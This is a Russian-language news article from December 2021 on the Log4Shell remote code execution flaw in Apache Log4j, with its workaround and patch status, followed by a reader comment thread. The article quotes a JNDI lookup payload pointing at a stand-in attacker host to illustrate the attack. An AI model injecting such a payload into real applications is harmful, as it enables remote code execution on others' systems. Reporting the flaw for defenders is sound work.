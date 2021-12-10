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Катастрофическая уязвимость в Apache Log4j, затрагивающая многие Java-проекты

10.12.2021 09:07

В Apache Log4j, популярном фреймворке для организации ведения логов в Java-приложениях, выявлена критическая уязвимость, позволяющая выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках.

Отмечается, что проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft. Ожидается, что уявзимость может привести к волне массовых атак на корпоративные приложения, повторив историю критических уязвимостей во фреймворке Apache Struts, который по приблизительной оценке применяется в web-приложениях 65% компаний из списка Fortune 100. В том числе уже зафиксированы попытки сканирования сети на предмет уязвимых систем.

Проблема усугубляется тем, что уже опубликован рабочий эксплоит, но исправления для стабильных веток на данный момент не сфромированы. СVE-идентификатор пока не присвоен. Исправление включено только в тестовую ветку log4j-2.15.0-rc1. В качестве обходного пути блокирования уязвимости рекомендуется выставить параметр log4j2.formatMsgNoLookups в значение true.

Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

Дополнение 1: Уязвимости присвоен идентификатор CVE-2021-44228.

Дополнение 2: Выявлен способ обхода защиты, добавленной выпуск log4j-2.15.0-rc1. Предложено новое обновление log4j-2.15.0-rc2 с более полной защитой от уязвимости. В коде выделяется изменение, связанное с отсутствием аварийного завершения в случае использования некорректно оформленного JNDI URL.

  1. Главная ссылка к новости (https://www.lunasec.io/docs/bl...)
  2. OpenNews: Ещё одна уязвимость в Apache httpd, позволяющая обратиться за пределы корневого каталога сайта
  3. OpenNews: Критическая уязвимость в Apache Struts
  4. OpenNews: Вредоносное ПО, поражающее NetBeans для внедрения бэкдоров в собираемые проекты
  5. OpenNews: Уязвимость в Apache Struts стала причиной утечки персональных данных 143 млн американцев
  6. OpenNews: Уязвимость в Apache CouchDB, позволяющая совершить атаку на реестр пакетов NPM
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/56319-log4j
Ключевые слова: log4j, vulnerability
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Обсуждение (31) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 09:23, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –9 +/
    «катастрофическая», лол
     
     
  • 2.4, Аноним (4), 09:30, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +10 +/
    Ну учитывая где используется Java и как там дела с обновлениями, то действительно все печально
     
  • 2.20, Аноним (20), 10:06, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Не так давно пол-США сидели без бензина и мяса когда ломанули оператора трубопроводной сети и оператора сети мясокомбинатов. А на яве написано допупа бизнес-логики.
     

  • 1.2, Антонио (??), 09:28, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +3 +/
    Переполнение буфера, говорили они. Безопасность, говорили они. Позор и срамота.
     
     
  • 2.9, btrfs (?), 09:43, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Простите за моё невежество, но как связаны реализация в языке и нечто криво реализованное на этом языке?
     
     
  • 3.11, Аноним (11), 09:49, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +8 +/
    Есть свидетели того, которые утверждают, что если убрать риски работы с памятью, то всё само наладится, и даже кости выпрямятся.
     
     
  • 4.33, йо (?), 10:35, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Я лично видел как после Rust-a слепой встал и пошёл.
     
  • 4.39, Аноним (39), 10:47, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Простите, но Вы звиздите. Никто из них не утверждал, что прям "всё само наладится". Исчезнут (почти) целые классы ошибок, коих большинство (70-80%), но логические ошибки в архитектуре системы или в реализации бизнес-логики никто не отменял - от прокладки зависит. Но Вы, конечно, припИшете оппонентам и поедание младенцев, хуже не будет, верно?
     

  • 1.3, Аноним (3), 09:30, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    ага, спасибо. прямо вот только что проснулся и побежал патчить свои Apple iCloud - сервера
     
  • 1.8, лютый жабби__ (?), 09:43, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    бред какой-то... даже если торчит майнкрафт голой ж в инет, ну запишите в логгер произвольный текст, я посмотрю на ваши успехи )

    "Надо срочно переписать на ржаву"

    твои мозги )

     
     
  • 2.10, Аноним (4), 09:45, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    А то что почти все банки на Java? При чем там лютый legacy
     
     
  • 3.19, лютый жабби__ (?), 10:04, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    >При чем там лютый legacy

    ты неправ. слышал, что у немцев можно 6-ку встретить, но в рф 8-11 уже почти везде. у всяких тупкофф-кредитно-пельменные-системы 17 + коклины, скалы, го и прочая смузибень ) уж версию log4j бампнуть не проблема.... хотя для типичного
    e.printStackTrace();
    данная "уязвимость" имхо неуязвима

     
     
  • 4.37, Онаним (?), 10:43, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Там легаси проприетарь, которая возможно уже местами просто не поддерживается, но сертифицировать новую версию ДОРОГО(tm). И бампнуть там ничего не получится либо потому что все версии библиотек тоже прибиты гвоздями по сертификации, либо потому, что API сменилось 100500 лет назад тому, и говно мамонта просто развалится.
     
  • 3.34, йо (?), 10:38, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Неправда, некоторые банки ещё на COBOL, и планируют перейти на модно-молодёжную Java.
     
  • 2.27, BratishkaErik (ok), 10:29, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Написал в чате > записало в логи > взлом

    Проголосовал на мониторинге с NuVotifier > записало в логи > взлом

     

  • 1.13, пох. (?), 09:51, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Но как же ж так? Ведь жаба же ж - безопастная?!

     
     
  • 2.18, Аноним12345 (?), 10:01, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Ни разу не безопасная
     
  • 2.32, Котофалк (?), 10:35, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Скилл написать небезопасно на каком угодно языке позволяет это преодолеть. И не только это. Тут как нельзя кстати набор поговорок про сломать сдуру, про стеклянный до обеда и иже с ними.
     
  • 2.36, йо (?), 10:41, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Это не Ява, это log4j.
     
     
  • 3.38, Онаним (?), 10:47, 10/12/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    Который к сожалению в рот тащит каждый третий проект из двух.
     

  • 1.16, d (??), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Давайте все усложним, что бы потом все упростить сложными путями.
     
  • 1.17, Аноним12345 (?), 10:00, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >> Возвращённый сервером атакующего путь будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

    Это действительно катастрофа
    С системой можно делать все что угодно
    Жаба, господа, та самая проприетарная жаба

     
  • 1.21, Аноним (21), 10:09, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Да весь код на яве такой дырявый. Чтобы передать стрингу или простейший boolean сразу используют RPC с уродским RMI
     
  • 1.22, BratishkaErik (ok), 10:09, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Ох, я не успел сделать новость... А вообще это круто — пусть люди поскорее узнают новость
     
  • 1.24, Аноним (24), 10:11, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Jndi для лога это точно нужная фича которая должна быть включена у всех по умолчанию? Может быть нафиг её?
    И вообще сетевые запросы отправлять в логе не выглядит безопасно.
     
  • 1.28, Аноним (28), 10:29, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    log4net в безопасности?
     
  • 1.29, пох. (?), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Кстати,поищите у себя в логах appdynamics. Эксплуатируемо или нет - не знаю, но им пользуется половина так называемого цивилизованного мира. Да, оно работает от рута.

    Да, конечно же там log4j, где ж его теперь нет.

     
  • 1.30, Аноним (30), 10:31, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    У меня вчера stream play на стиме сам без особой причины запустился. И начал двигать мышью и открыл виртуальную клаву Steam. у меня есть основания полагать что уже активно юзают это чудо.
     
  • 1.31, DEF (?), 10:35, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Блин. Мои хелловорлды юзают log4j2. Ждем фиксов!
     
  • 1.35, Онаним (?), 10:40, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    >  "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу

    Макаки конечно везде одинаковые, да...
    Это ж надо такую срань в систему логгирования воткнуть.
    А вот просто ${var} и передачу var отдельно - ну никак было.

     
  • 1.40, Аноним (-), 10:49, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    По непроверенным данным дыра проявляется в госуслугах и вёбинтерфейсах кучи крупных банков. Лично перепроверить не решился, так как за такую проверку и посадить могут.
     
  • 1.41, Аноним (41), 10:51, 10/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Типа безопасные языки. Надо было писать на Rust :)
     

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